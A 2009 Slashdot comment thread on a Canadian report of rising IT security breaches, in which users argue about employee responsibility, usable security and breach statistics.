×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

IT Security Breaches Soar In 2009

kdawson posted more than 4 years ago | from the inside-jobs dept.

Security 65

slak11 quotes from a Globe and Mail article on the jump in corporate and government security breaches year-over-year. (The reporting is from Canada but the picture is probably much the same in the US.) "This does not seem to be all that newsworthy these days, since stories like this are appearing on a regular basis. The one detail I did like — that seems to break from the traditional 'hackers cause all the bad stuff' reporting — is the mention that everyday employees are a major cause of breaches. The recent Rocky Mountain Bank/Google story is a perfect example. As stated in the article: 'But lower security budgets aren't the only reason breaches tend to soar during tough economic times — employees themselves can often be the cause of such problems.' I figure this will be an ongoing problem until company management and employees accept their role in keeping company information safe. And IT people need to understand that regular employees are not propeller-heads like Slashdot readers, and to begin to implement technology and processes that average people can understand and use."

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

65 comments

Coincidence? (3, Funny)

Dyinobal (1427207) | more than 4 years ago | (#29586863)

Coincidence? That it's the same year Windows 7 was released? dun dun dun!

Re:Coincidence? (1)

CannonballHead (842625) | more than 4 years ago | (#29586963)

Was? I had no idea it was October 22nd already. [microsoft.com]

ladies, get your pussies ready! (-1, Offtopic)

Anonymous Coward | more than 4 years ago | (#29587369)

Our movie is nothing like The Hangover except in the vaguest plot descriptions, and in the most important way--humor--its way way better. Like, not even comparable. The worst jokes in our movie kill the best in The Hangover, even ignoring the fact that pretty much all the best lines were in the trailer.

Plus, I am super excited to see that movie do well. It proves the market for our concept--that hard R movies without stars, about guys and drinking are viable--and anything that movie can do at the box office, we can beat. Easily. It's like watching someone fight your opponent first, and you get to see exactly what you are in for.

If there do end up being a lot of comparisons, it will go poorly, but not for us. The Hangover is probably one of the best comedies of the last ten years, but all that means is that comedy has sucked for ten years. The days of being able to pass off dogshit like The Hangover as great comedy end on September 25th. We are going to sweep in out of nowhere and shake up the comedy world. The bar will be raised.

And if you doubt me, that's cool. Stand in line behind all the other the doubters--the ones who said I couldn't be a writer, or my website couldn't be a book, or my book wouldn't be a best seller, or I couldn't write a movie, or I couldn't get that movie made, or I couldn't get the movie distributed, etc, etc, etc. They have been wrong every time in the past, and they will be wrong this time.

Re:Coincidence? (3, Funny)

frosty_tsm (933163) | more than 4 years ago | (#29587737)

Coincidence? That it's the same year Windows 7 was released? dun dun dun!

It's also the year in which Windows Vista adoption peaked.

Re:Coincidence? (2, Funny)

Korbeau (913903) | more than 4 years ago | (#29589281)

It's also the year in which Windows Vista adoption peaked.

I already adopted a Windows Vista and recommend everyone to do so - it's for such a good cause! For a couple hundreds of bucks they send you a round-framed picture of it. I have it on my fridge. Please, think of the poor Vistas struggling to live!

Re:Coincidence? (1)

selven (1556643) | more than 4 years ago | (#29600287)

It's also the year in which Kirill I [wikipedia.org] became the patriarch in Russia. Clearly the Russian Orthodox Church is responsible for this.

Re:Coincidence? (1)

CAIMLAS (41445) | more than 4 years ago | (#29590143)

More likely, it's a year where barely anyone has been hiring, and a lot of layoffs have been made. I was thinking it was bad last fall, but shit! This year I saw no more than 2 IT related postings locally from February until August. In 2008, I'd see 5-10 or so a month.

When your IT staff is at "skeleton" levels because you don't know what you're doing, you're going to reap the whirlwind. The first thing to go out the door is security vigilance, because it's usually the last thing that's given conscious thought (unless users are complaining about something specific, in which case it becomes your first thought).

Mafiaa and "terrorists" (4, Interesting)

religious freak (1005821) | more than 4 years ago | (#29586897)

The one thing I don't understand is, why don't we actually see MORE breaches in data security than we do now? I mean like real deal, big time, Italian Job / Oceans 11 type stuff. Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

Really, even if you amalgamate enough talent to become 1/4 of a state actor in terms of budget / knowledge, you could make all kinds of money, XSS, SQL injection, social engineering, etc. I'm really surprised we haven't seen a major IT heist yet.

Re:Mafiaa and "terrorists" (5, Insightful)

wigaloo (897600) | more than 4 years ago | (#29587001)

The one thing I don't understand is, why don't we actually see MORE breaches in data security than we do now? I mean like real deal, big time, Italian Job / Oceans 11 type stuff. Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

What we learned during the 2008 financial crisis is that there are plenty of ways for crooks to steal an infinite amount of money legally.

Re:Mafiaa and "terrorists" (1)

NoYob (1630681) | more than 4 years ago | (#29587057)

The one thing I don't understand is, why don't we actually see MORE breaches in data security than we do now? I mean like real deal, big time, Italian Job / Oceans 11 type stuff. Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

What we learned during the 2008 financial crisis is that there are plenty of ways for crooks to steal an infinite amount of money legally.

...and be lauded for it.

Re:Mafiaa and "terrorists" (-1, Troll)

Anonymous Coward | more than 4 years ago | (#29587725)

Sigh. It seems that no matter what happens here there is always and appropriate Dilbert [imageshack.us] strip.

Re:Mafiaa and "terrorists" (1)

MichaelSmith (789609) | more than 4 years ago | (#29587633)

Two possibilities come to mind:

  • People smart enough to pull that kind of thing off know that the cops really aren't stupid and that spending time in jail with really dumb people would be worse for them than for normal dumb crooks.
  • Victims of crimes of this nature don't want their investors/customers/competitors to know thay have been ripped off so they try not to advertise the fact that they have been ripped off.

Re:Mafiaa and "terrorists" (1)

frosty_tsm (933163) | more than 4 years ago | (#29587757)

Two possibilities come to mind:

  • People smart enough to pull that kind of thing off know that the cops really aren't stupid and that spending time in jail with really dumb people would be worse for them than for normal dumb crooks.
  • Victims of crimes of this nature don't want their investors/customers/competitors to know thay have been ripped off so they try not to advertise the fact that they have been ripped off.

Also, people that smart tend to have other options with better risk to profit ratios.

Re:Mafiaa and "terrorists" (0)

Anonymous Coward | more than 4 years ago | (#29587795)

Yeah a little crime here and there, ok. But with IT pervading every major monetary transaction, people in the know could essentially steal an infinite amount of money.

Perhaps you were not paying attention to the US bailouts, looks like a major theft to me!!
Captcha is "veered" seems oddly appropriate to me.

Re:Mafiaa and "terrorists" (1)

FreakyGreenLeaky (1536953) | more than 4 years ago | (#29591513)

I'm really surprised we haven't seen a major IT heist yet.

Probably because these events are rarely made public. The goodwill/brand/image damage of these things becoming publicly known often far outweighs the value of the actual theft.

Re:Mafiaa and "terrorists" (1)

hesaigo999ca (786966) | more than 4 years ago | (#29592513)

Probably because ie- like in entrapment with the Chinese bank heist, or oceans 11 or 12 or 13, the Casinos have their own security in place and are always up to date with all technologies, same with overseas banks of a certain level.
Banks here like td, or scotia are small in comparison, and don't want to invest money in security.

The TJX problems are the same, a big store like TJX seems to have shortfalls, where someone like Le Chateau have
vmware in use, needing the best of the best to keep the networks going and would never be subject to a usb key infiltration because they disabled all the on board usb channels... TJX might have used thrid party vendors and such...like Dell to preconfigure all their hardware, hence the lack of proper security.

Oh no! (0)

Anonymous Coward | more than 4 years ago | (#29586997)

nothing quite like a secutiry breach.

Re:Oh no! (2, Interesting)

plover (150551) | more than 4 years ago | (#29587453)

Oh no! This is nothing like fact-based reporting, either.

Look at the graph on the banner of OSF Dataloss [datalossdb.org] . That banner, right across the top, shows the number of reported incidents, month by month, since Feb 2007. The 2007 average seems to be in the mid-40s. The 2008 average seems to be about 60 per month. The 2009 bar graph is steadily sloping downwards, starting from a high of 61 incidents in Feburary dropping down steadily to 23 last month and 16 this month.

To be a bit more factual, you can visit the statistics. [datalossdb.org] That shows the progression from 2005-2009 looking like this:
2005 140
2006 530
2007 484
2008 703
2009 331

Nothing in the statistics even remotely seems as bad as last year, and this year's pace seems to be trending towards even fewer breaches than 2006's level.

I call shenanigans on this report!

Re:Oh no! (0)

Anonymous Coward | more than 4 years ago | (#29587643)

Could be shenanigans, but they're using different metrics. OSF uses media reports to search for breaches that have been made public whereas TFA conducted a survey of "more than 600 Canadian IT security professionals."

Re:Oh no! (1)

plover (150551) | more than 4 years ago | (#29587787)

Could be shenanigans, but they're using different metrics. OSF uses media reports to search for breaches that have been made public whereas TFA conducted a survey of "more than 600 Canadian IT security professionals."

After I posted it, I figure that if they weren't looking at 2009 (because most reporting is done on an annual basis), 2008 does indeed look pretty terrible by comparison to the rest of the years. Although TFA does say that in 2009 the security professionals are reporting 11 incidents per organization compared to 3 per org in 2008.

So, are the Canadian corporations better at hiding breaches from the public than the OSF indicates? Are the "professionals" overreporting and including counts of attempted breaches, like drive-by WEP attacks that go nowhere, or phishing emails, or viruses? Or is this a real count of actual breaches that caused a loss of valuable data, and they're just not telling us?

Re:Oh no! (1)

cbiltcliffe (186293) | more than 4 years ago | (#29608603)

A few reasons:

1. Canada has no mandatory notification law, so they frequently won't be published.
2. People who are still using WEP for their wireless security aren't going to be looking for attempted attacks.

This is probably a worst possible case scenario, like "all the data that could have been breached, but we don't necessarily know it was", but I would think it's probably realistic.

Re:Oh no! (2, Insightful)

lysergic.acid (845423) | more than 4 years ago | (#29587773)

OSF Dataloss seems to be counting the number of data breaches (i.e. database of customer info being leaked, millions of credit card numbers being stolen, etc.), whereas this article refers to security breaches in general, not just those that affect personal privacy. Also, the article seems to be based on Canadian statistics, as well as going by the cost of damages rather than the number of breaches that occurred.

I mean, if in 2008, there were 703 breaches, each only making off with a $10~20k of data on average, whereas the 331 breaches this year average $100k in data, then that's still a huge increase the severity of the security breaches.

Simply counting the number of breaches on record just doesn't paint the full picture.

Re:Oh no! (2, Informative)

plover (150551) | more than 4 years ago | (#29587963)

Aha, I found that they have "number of records" metrics, too, as long as you're willing to harvest them out of their reports.

2009 YTD:
Total Incidents: 330
Total Records Affected: 138,772,156

2008:
Total Incidents: 703
Total Records Affected: 85,843,506

2007:
Total Incidents: 484
Total Records Affected: 165,184,031

2006:
Total Incidents: 530
Total Records Affected: 51,142,868

2005:
Total Incidents: 140
Total Records Affected: 55,988,256

So 2009 is indeed a "severe" year in terms of records lost. Again, though, these are totals of all reportedly lost data, regardless of how the data went missing. A backup tape with 100,000 records lost in a dumpster counts equally with a hacker stealing 100,000 credit cards from a web site, even though one loss clearly places the data at a higher risk for fraudulent use than the other.

Re:Oh no! (1)

plover (150551) | more than 4 years ago | (#29588001)

I just realized there might be a positive spin to their numbers as well. Because security awareness has been at the current peak for only a short while (it's really taken off in the last two or three years), it's possible that they're reporting higher numbers of attacks because they now have the tools and monitors in place to detect the higher numbers. Perhaps hacking is not nearly as bad now as it was before, it's just that they didn't know they were being hacked before, and now they do.

Propeller-heads (5, Insightful)

causality (777677) | more than 4 years ago | (#29587067)

And IT people need to understand that regular employees are not propeller-heads like Slashdot readers, and to begin to implement technology and processes that average people can understand and use.

You have to love the implication that IT staff purposefully choose the most arcane implementation for the hell of it, or that they enjoy the support calls they receive when users have a hard time with a system. Sometimes what you are doing is inherently complex, and some ability to deal with complexity is necessary. The way I see it, there are two broad approaches to the problem of "implement[ing] technology and processes that average people can understand and use." One is to simplify those technologies and processes. The other is to increase the understanding of the users, or for the users to increase their own understanding.

For some reason, most discussions like this seem to have this unstated assumption that the former approach is the only possible one. I'd like to see more of a middle-ground solution. I like Einstein's saying about how things should be made as simple as possible, but no simpler. Once that is done, if the users still find the systems and processes to be too complex, and their job requires the ability to handle same, then I would conclude that this means they are not qualified for their job and need to be replaced by someone with more understanding. Is that really such a scary conclusion that we must perform all sorts of musings and mental gymnastics to avoid it? Because I certainly believe that people can improve if it is expected of them, if there are not infinite excuses for their shortcomings. For that reason, I don't believe that regarding users who can't handle good systems as unqualified would result in tremendous turnover within a company. I think it would result in more savvy users, even if only to avoid being fired. It would certainly help to disabuse people of this mentality that basic competency is only for nerds, hardcore geeks, and experts.

Re:Propeller-heads (0)

Anonymous Coward | more than 4 years ago | (#29587455)

Thanks to Microsoft, people have been taught that you can run an operating system, manage a database of information, and even program without knowing what the hell they are doing.

Re:Propeller-heads (1)

Sulphur (1548251) | more than 4 years ago | (#29588183)

We can't solve problems by using the same kind of thinking we used when we created them. Einstein

Re:Propeller-heads (1)

myowntrueself (607117) | more than 4 years ago | (#29587619)

You have to love the implication that IT staff purposefully choose the most arcane implementation for the hell of it

I know for a fact that many programmers and engineers do indeed *purposefully* make things more complex than they need to be.

People like this enjoy a challenge. Writing code thats hard for others to understand (or themselves in a few weeks time) gives them a sense of accomplishment.

People like this enjoy the careful crafting of complexities layered upon complexities.

Myself, I recite 'keep it simple, stupid' to myself over and over. Its my mantra.

Cleaning up after someone elses excessive overcomplification of something that could have been done simply and cleanly is the bane of my existance.

Re:Propeller-heads (1, Funny)

Anonymous Coward | more than 4 years ago | (#29587641)

Cleaning up after someone elses excessive overcomplification of something that could have been done simply and cleanly is the bane of my existance.

hey, shut up asshoel! we keep you employed!!

Re:Propeller-heads (3, Insightful)

plover (150551) | more than 4 years ago | (#29587749)

But "simple" does not mean "secure". Yes, simple is easier to verify, but you can write simple, clean code and still get hit with a security incident.

Code that is simple and secure today also doesn't mean that it will be secure tomorrow, once the next exploit is created and discovered. How long ago was it before javascript existed? Nobody cared if you put <script> tags in your comments, because browsers didn't even know the keyword "script". Suddenly browsers started appearing that supported this tag, and people got creative when posting comments, including cute scripts to animate their signatures. Then XSS attacks were discovered and became all the rage, and perfectly secure web sites around the globe suddenly had a new threat model that became their responsibility to clean up.

You can review simple code all day long and assure yourself that it will do what it's supposed to do. But it's very, very hard to review code to ensure that it won't do something bad, especially when you don't have tomorrow's definition for "bad" to review against!

Re:Propeller-heads (1)

causality (777677) | more than 4 years ago | (#29588185)

You have to love the implication that IT staff purposefully choose the most arcane implementation for the hell of it

I know for a fact that many programmers and engineers do indeed *purposefully* make things more complex than they need to be.

People like this enjoy a challenge. Writing code thats hard for others to understand (or themselves in a few weeks time) gives them a sense of accomplishment.

People like this enjoy the careful crafting of complexities layered upon complexities.

Myself, I recite 'keep it simple, stupid' to myself over and over. Its my mantra.

Cleaning up after someone elses excessive overcomplification of something that could have been done simply and cleanly is the bane of my existance.

Then I would say that they are not being challenged enough. The ability to produce something that is simple, robust, elegant, and maybe even beautiful and especially the mentality that can appreciate these things is so significant of a challenge that most end up failing a test that they did not know they were taking, so to speak. That quality may never become common-as-dirt because what sort of person you are, which values you possess, and what attitude you have towards life in general has a lot to do with whether you can appreciate the simple or whether you have a need to prove something. That this "trait" be recognized and identified is a good first step towards cultivating it in the workplace.

It really is a win-win even if you must look at it in mundane terms of marketing. The organization benefits when IT runs smoothly and its systems are robust. IT benefits when there is no needless time pressure brought on by excess complexity that is only present to soothe someone's fevered ego. The only things holding back change are institutional inertia and lack of the willingness to perform this sort of introspection. Both are surmountable.

Dude... (1)

endus (698588) | more than 4 years ago | (#29589023)

Experience is the reason that the former is always assumed to be the only approach. Users don't give a fuck about understanding more or learning more or taking any responsibility at all for the security of the IT infrastructure. It often seems, in fact, that the more critical the position they hold in regards to access to sensitive information (doctors, lawyers, etc.) the more resistant they are to learning about IT or doing their part to keep the organization secure.

The ONLY solution is the former. As the population of workers is replaced by people who grew up with IT there will be fewer extreme examples of people totally unwilling to do anything at all, but in the end the user mentality remains the same. The ONLY solution is to simplify the solutions and force them, via policy, to accept "the best we can do".

I see this in every aspect of my job. Tell the sys admin that his server is off the wire because it was attempting to infect thousands of other critical servers and possibly even equipment which is even more critical and all he does is complain to his director that you're being a dick and not letting his box, that he failed to patch for 5 years, back on the wire...and thats an IT person. Don't get me started on explaining to the high-muckity-muck that their VPN connected laptop was the source of a worm which infected 200 computers with something they downloaded from a porn site.

The notion that basic competency is only for nerds, hardcore geeks, and experts is rooted firmly in the fact that almost no one is competent or even somewhat intelligent. Most people are stupid as fuck. They manage to do their job like a monkey can learn to press a button and get a treat, but try and teach that same monkey to type a password and get a treat and you're officially well past the point of diminishing returns.

Re:Dude... (3, Insightful)

rtb61 (674572) | more than 4 years ago | (#29589799)

Easiest solution to your problem, parallel networks. An internal secure network, accounting, payroll, banking, data management, cad, cam, publishing etc. and an external network email and internet access. Lock down the internal network, tight, no internet access, no portable media, data is either input at the keyboard or uploaded at the IT office after it is reviewed and scanned.

External network, let the children play and create a USB reboot and rebuild stick for each notebook. You will be a whole lot less frustrated and the children will be happy as they get to play without controls and, by children I do mean the executive pool. Keep it simple internal wired and external wireless, in office try to use infra-red for wireless, it is more restricted and safer.

This way only one machine at a time gets infected on the external network and the infection is always from the net rather than internal. Internal a desktop/terminal, external cheap netbooks/smartbook basically a throw away and in affect an extension of a mobile phone.

Best thing about this, passwords not a problem, unless they break into the specific office to gain access to the specific files than they are out of luck and the server room itself can be fully secured and alarmed, basically a vault.

I.T. IS COMPLICATED, GET USED TO IT! (3, Insightful)

uslurper (459546) | more than 4 years ago | (#29587173)

" And IT people need to understand that regular employees are not propeller-heads like Slashdot readers, and to begin to implement technology and processes that average people can understand and use."

This is exactly the attitude that causes insecure environments. Security IS complicated. Accounting IS complicated. Networking IS complicated. PC's ARE complicated. Fuck people realize that I.T. IS COMPLICATED. Give your IT Department the tools and authority to run their department the way it needs to be done.

Re:I.T. IS COMPLICATED, GET USED TO IT! (2, Insightful)

jklovanc (1603149) | more than 4 years ago | (#29587723)

Yes, it is complicated. It is also understandable if enough information is given to the users. The standard IT responses of "it's company policy" and "just do it" do not cut it in an intelligent workplace. Sure you want users to follow the rules but giving real reasons why might just raise compliance.

Re:I.T. IS COMPLICATED, GET USED TO IT! (0)

Anonymous Coward | more than 4 years ago | (#29589305)

"But I just figured since (stupid premise) (faulty logic) (company policy) it would be just fine, as long as I was careful."

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

CAIMLAS (41445) | more than 4 years ago | (#29590179)

The alternative to "it's company policy" is explaining Active Directory/UAC/ACLs to them, and they feel like you're talking over their heads/insulting them. Or trying, in some sort of perverted fashion which doesn't actually make all that much sense - and then they feel like you're condescending/insulting them.

When your average IT worker has (say) an IQ of 120, which is 10-15 points higher than the average officer worker (best case scenario!), you're not working in an "intelligent workplace". Most workplaces are not "intelligent". And even in an "intelligent" work place (say, an accounting firm or a law firm), the chances are high that the domain of knowledge is so far divorced from their reality that you might as well speak in reverse-polish notation Sanskrit.

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

jklovanc (1603149) | more than 4 years ago | (#29590857)

You do not have to explain the technology; you have to explain the consequences.

For example; To explain the need for strong passwords and not writing them down on a piece of paper next to your computer. "If someone figured out or found your password they could log into our system and as far as the system is concerned they would be you. Do you really want to be blamed for something someone else did?"

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

BVis (267028) | more than 4 years ago | (#29592331)

For example; To explain the need for strong passwords and not writing them down on a piece of paper next to your computer. "If someone figured out or found your password they could log into our system and as far as the system is concerned they would be you. Do you really want to be blamed for something someone else did?"

No.

"Use a strong password and don't write it down, or else you'll get fired."
"Don't plug your own USB key into a company computer, or else you'll get fired."
"Don't surf porn sites on your company laptop, or else you'll get fired."
"Don't attempt to circumvent company security policy, or else you'll get fired."

I bet you'll find security is a lot better after that, or after one or two idiots is made an example of by being shown the door in front of all his/her coworkers. The only way to enforce even a 'reasonable' security policy (strong passwords, no USB keys/boot CDs, no unauthorized equipment on company networks, don't be stupid) is to have an AUP and give it some real teeth. (And yes, "don't be stupid" is a valid part of a 'reasonable' security policy. If someone is stupid, they can work for someone else.)

Re:I.T. IS COMPLICATED, GET USED TO IT! (0)

Anonymous Coward | more than 4 years ago | (#29592993)

(And yes, "don't be stupid" is a valid part of a 'reasonable' security policy. If someone is stupid, they can work for someone else.)

You're asking way too damned much. You're also setting yourself up for a fall the first time the CEO comes in asking you to reimage their corporate laptop which got infected while they were surfing porn from Starbuck's that morning (true story).

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

jklovanc (1603149) | more than 4 years ago | (#29600169)

This is a perfect example of why IT rules do not get followed. Even firing a few people for infraction probably would not work. Most people would think "No one would get fired for such a minor issue. I bet that was just an excuse. There must be some other reason." Even if it did work, the only people who would be effected by it would be in the same office as the person fired. Possibly effective for a single office company; not so good for a large company (or are you suggesting firing someone from every office before the message gets through). What is wrong with giving out a little extra information so that people understand the reason behind the rule?

"Use a strong password and don't write it down, or someone can masquerade as you, you will be blamed for their actions and you'll get fired."

"Don't plug your own USB key into a company computer, or our network could be infected by a virus costing thousands of $ and you'll get fired."

"Don't surf porn sites on your company laptop, or we could be sued for sexual harassment costing us thousands of $ and you'll get fired."

Would you rather have users think "stupid rule, screw it" or "Now I understand, I better follow it".

BTW, "don't be stupid" is not a valid AUP clause. An AUP is a legal document the will be referred to in any wrongful dismissal suit. "Don't be stupid" is vague and open to interpretation and would not hold up in court. It relies on the company being able to prove that the employee knew something was stupid and did it anyway; extremely difficult at best.

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

CAIMLAS (41445) | more than 4 years ago | (#29599959)

That's rarely something which needs to be described, and in most small environments, it's usually something of marginal consequence.

The biggest concern for security breaches is malware and the associated data harvesting. When you've got users running as Administrator, it's a bit of a problem. The users will get into pissing fights when you've got to revoke their ability to install "screensavers" and the like.

Re:I.T. IS COMPLICATED, GET USED TO IT! (0)

Anonymous Coward | more than 4 years ago | (#29587765)

OK, so what about Group Policy and things like BeyondTrust? Our experts can never seem to explain to us exactly why a given user is prevented from doing something, nor can they tell us how to diagnose a problem ourselves. Is that the users' problem or Group Policy, or BeyondTrust, or IT?

Seriously, I want to know, because no one who manages the policy stuff can explain it.

Re:I.T. IS COMPLICATED, GET USED TO IT! (1)

endus (698588) | more than 4 years ago | (#29588939)

The comments here are clearly full of security pros. Awesome.

I totally agree with you. I don't think it SHOULD be that way or that it NEEDS to be that way...but it is that way, especially today. We're so anxious to adopt IT and let it permeate every aspect of every organization but we're completely unwilling to deal with the consequences and mitigate the risks. Upper management is a bunch of balloon heads who don't know the first god damn thing about computers or security so when it comes down to "gosh we really need to have users type a password for this or it could be really bad" the answer is always "duhhhhhhhhhhh that sounds hard...forget about it".

Security (4, Insightful)

oldhack (1037484) | more than 4 years ago | (#29587207)

Security is a lot like IT, but much more so. It's waste of money until shit hits the fan. 5 minutes later, it becomes waste of money again. But it's difficult to judge how close you're to shit-blade collision point, though, because in the end it's an effort to mitigate breach, not a guarantee, and news stories that do pop up tend to be sensationalistic and doesn't help the assessment.

Re:Security (1)

PRMan (959735) | more than 4 years ago | (#29587807)

Ah, but what most IT people do NOT realize, is that the more you increase security beyond a reasonable point, the MORE likely you are to have a breach, because the only way people can do their work is to go around your security by using USB flash drives and burning CDs.

Most IT professionals seem to have a hard time with REASONABLE security, either being too lax and having virtually no security (as with some of the stories we have heard) or being so restrictive that nobody can do their work and resorts to flash drives, laptops and CDs (the rest of the stories we have heard).

Re:Security (1)

causality (777677) | more than 4 years ago | (#29588407)

Ah, but what most IT people do NOT realize, is that the more you increase security beyond a reasonable point, the MORE likely you are to have a breach, because the only way people can do their work is to go around your security by using USB flash drives and burning CDs.

Things which do not correctly balance opposing forces or opposing goals are much more likely to fail and this is a universal principle, applicable everywhere. Various sages and philosophers from many different cultures have noted this principle and its implications for thousands of years, and probably longer than that. The problem, then, is that people do not understand principles like this and when they specialize, they memorize procedures and inventories of knowledge and methods of problem solving but they do not recognize the general principles that still apply to their specialty. Personally I believe this is because they get so caught up in what they do that everything becomes immediate and they lose the ability to mentally take a step back and maintain their objectivity.

Motivation (3, Insightful)

whoever57 (658626) | more than 4 years ago | (#29587521)

... employees themselves can often be the cause of such problems.' I figure this will be an ongoing problem until company management and employees accept their role in keeping company information safe

I figure it will continue to be a problem until company management provides the appropriate motivation and training to employees to keep company data safe. This won't happen until management also has the appropriate motivation. Did anyone in management get fired over the Rocky Mountain bank/Google incident? How much has this cost the bank?

Re:Motivation (1)

drinkypoo (153816) | more than 4 years ago | (#29591963)

THIS is the absolute truth. The problem is the lack of accountability. I personally think that it is enough to fine companies who do this kind of thing to the point where they are unprofitable. Throw the fines into the general pool, and let the taxpayers keep some more of their money. You'll see the corporations go looking for more responsible CEOs &c in no time.

...the same in the US. (1)

mevets (322601) | more than 4 years ago | (#29587525)

yes, except it will be pictures, with arrows, and small words arranged as digestible catch phrases. Perhaps a pie chart.

A new law in security. (2, Insightful)

Polarina (1389203) | more than 4 years ago | (#29587673)

Everything that can be hacked, will be hacked. If not in your lifetime, then in mine.

There is no jump (-1)

girlintraining (1395911) | more than 4 years ago | (#29587805)

This "jump" you're seeing has nothing to do with an increase in the problem; But rather an increase in the use of insecure technologies. Most crimes are crimes of opportunity, and IT security breaches are no exception. The reason for the uptick is due to an increase in attack surface area and the fact that a lot more people are slipping into poverty. An increase in unemployment and poverty has always resulted in an increase in the crime rate.

From My Experience (2, Interesting)

Penguinshit (591885) | more than 4 years ago | (#29587831)

The best way is to remove the users' ability to do damage by enforcing tight GPOs, blocking access to certain types of websites, denying the ability to install software without your participation, blocking certain ports at the demarc (ingress and egress), enforcing automatic patching and virus data file updates, etc.

It seems draconian but once they get used to not going to Facebook or eBay or playing Elf Bowling during work the whining settles down. Oddly enough most of the grumbling comes from the PhDs (who should fucking well know better) and not the administrative staff.

User education helps but only to a narrow limit and degrades fast. You need to make internal security breaches an overt hostile act, which in normal commercial companies is extremely hard to prevent without also retarding the ability to get work done.

Security Always Loses (2, Insightful)

endus (698588) | more than 4 years ago | (#29588901)

"I figure this will be an ongoing problem until company management and employees accept their role in keeping company information safe."

Exactly. I suppose it's not that surprising that everyone wants all the benefits of IT without any of the responsibility given that a solid 90% of people are just too fucking stupid to understand that it even HAS consequences, but the willful disregard for protecting customers/patients info is just pathetic. You work in the medical industry and you see that doctors and nurses and sys admins just don't give a fuck about protecting their patients identities and privacy, regardless of how small an inconvenience they face.

I understand that a lot of security solutions are not always convenient but the level of laziness and disregard for people is really inexcusable. You wanna know the truth? Really easy to use security solutions just aren't here yet in a lot of areas. That's a fact. Viruses, worms, system compromises, botnets, identity theft...those ARE here in ALL areas. That's also a fact. If people don't like it then they should go back to using paper records...uhoh...that sounds a little more inconvenient than remembering two passwords doesn't it?

I realize this comment makes me sound like a security nazi but honestly I am pretty good at bridging the gap and have worked on both sides of the security fence. I am just really really tired of users whining. To a point, yes, usability is very important for a lot of reasons and anywhere possible you should strike a balance between usability and security. I don't discount that. However, in a lot of organizations security ALWAYS loses that battle...ALWAYS. Companies are jumping through incredible hoops to meet regs and appease auditors while willfully engaging in egregious breaches of security in areas not covered by laws.

Re:Security Always Loses (1)

fluffernutter (1411889) | more than 4 years ago | (#29588987)

If I ever wind up working in your workplace, kindly remind me to shoot myself; it will be much easier.

Re:Security Always Loses (1)

endus (698588) | more than 4 years ago | (#29589045)

I don't have a clue who the fuck you are but rest assured that I will remind you of this daily. It really doesn't require any special preparation or remembrance on my part..."god, I wish I could just blow my brains out" is pretty much my mantra.

why assume? (0)

Anonymous Coward | more than 4 years ago | (#29590493)

That the US will be the same as Canada? Or that any other country will be the same as the US?

Cultural, social, economic and many other differences affect how different countries handle IT. It is nonsense to assume that stats in one country mean the same in any other. The UK has LOTS of personal computers in botnets, loses lots of portable media, but hardly any corporate or government hacking. The US has LOTS of corporate hacking but somewhat better controlled personal computers.

In the 70's and 80's the brits couldn't make a decent car for shit, but the japanese built great ones. The US cornered the global market on fast food chains. The UK make the best hifi's, the french the best wine.

Stop globalising this crap!

Security is like buying Insurance (1)

Phrogman (80473) | more than 4 years ago | (#29596233)

In the sense that while you have it and pay for it, it feels like a waste of time and money, but when you really need it it, its too late if you didn't get it already :P
I am always amazed at the number of places that I have worked that put reasonable security measures in place but then let them be defeated by bad employee practices. The most common would be instances where multiple users share the same password on some machine or application on a machine because it was too difficult to remember the password for multiple people, so they use a common password instead. And the number of places where the password is of course written down on a sticky note stuck to the computer. People view security as a nuisance mostly, and are quite willing to bypass it if it gets in the way of convenience.
We need a better solution than username/password combos, because people are unreliable if something is inconvenient.

Check for New Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...